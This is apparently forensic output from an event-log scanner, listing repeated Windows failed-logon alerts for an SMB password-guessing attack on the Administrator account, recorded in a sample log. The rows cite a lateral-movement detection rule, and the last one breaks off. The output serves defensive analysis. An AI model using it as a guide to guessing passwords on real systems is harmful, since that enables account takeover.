2016-09-20 01:52:42.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IJZjTqY5innWcvSZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.273 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ymXIp0KTw0vIbB0N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZpPJEcLv7BoZaQwT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cz14Cv861RhFh0Pa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H8BklDHdS0cdcbGu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0m5Mznl2khRMj31V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.472 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ha6TuN7C8V0roSAK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.517 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9oBW0yE5a9zSkpIH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.566 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n54EaKOUQIX9geqx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m6WCg3o4oatO42wW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KfCwo8ZUWiBqI8zC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.692 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8potisENMIsbNxcd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WgagMNj95dkg9uQd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o1EVsGLFugwePvgR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6q00SeueJQAiBGpe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWzSR1cJ2XJNirSW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 39MY5ZvRJSHVkZZV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.944 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WyOdltctwdHNkH6i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUcWk0xJn9zVMZSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.023 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f2sauqNlJi3y0ZBk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bkih5QcLlcjw9gjg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3KlUJslcpS9jhLY4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: riuVWV1Ugr9c22hR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.189 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OSj1I0sXkPf96OL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KsOJDxDiZSjoBj6F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uH0bQ9zEi1xcfHn3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3AfNT0p4JC1VEfDd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.353 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S7T8R8U1WVHZQrYk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kamexpa7isWT8gLC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8CyHFKVcdTo0Upx3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U30aMcZuBD08GWK1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4mihftSCNCYdlBny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.553 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K2wa0xwK6tnurGJQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0V3TbNrKEnrDcEYt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T73JW9JURm8Br6MA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OAleyg3h8aMvVVJk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.713 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1LQllnWZFUIWa6rw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.757 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlwPxSGUmvYH0rpL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VrI56o5TyeO48rQV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CKRMn75tv5Yi5rYK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MbJvec7rVisJ6WCC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xoubp5WTPqblBaps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rBczkR92cKY41icQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MfUx3OizEb1LiOzj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SRaSOLOWhBEr0qkz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YnlI8Zh4td5m1fpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wXUDXDa4wi3HivKo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.174 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TT7iOtVMFcEysCcI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1NJpI7KC3gj99aWs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H39cv9JEuLEjlp93 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4p9h1cjLeUzppSZb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0fOpi4vr55QmO6x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.472 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GiKI4V6kpkY5zc9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dLmu4n9qZdf3Q5zo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 87iJdX2E0ZJintvr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nxc4iIHP0kdqQNiG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RJIWekwBwcIUWjD1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:44.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GdnvboiIDzXTZ8MR | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QGMPHNpljTlMYeet | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.794 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWo4uVFtAbe4IjKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YAPdDqbMY4rYiuZ3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ai2WCQ3MkWwSeOy9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.946 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ey1wbsD7w3fs02xP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:44.983 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sVGzidwZICNfLizg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zjGPMJ6RBw48Ejx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MydK8AjPvyyckCEL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.105 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fqkCliAQMiFffQU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITkku4kN4csBFyUB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f5g9kMkSFhKrT2Py | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1xKLdwujTmLEc9ts | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sAW1YzCQ3CreseaP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.326 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhqBirEHOKPepR3n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.376 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5uqSFXpzAWOnc90n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: McbeS9lRpbMc48jO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:45.477 
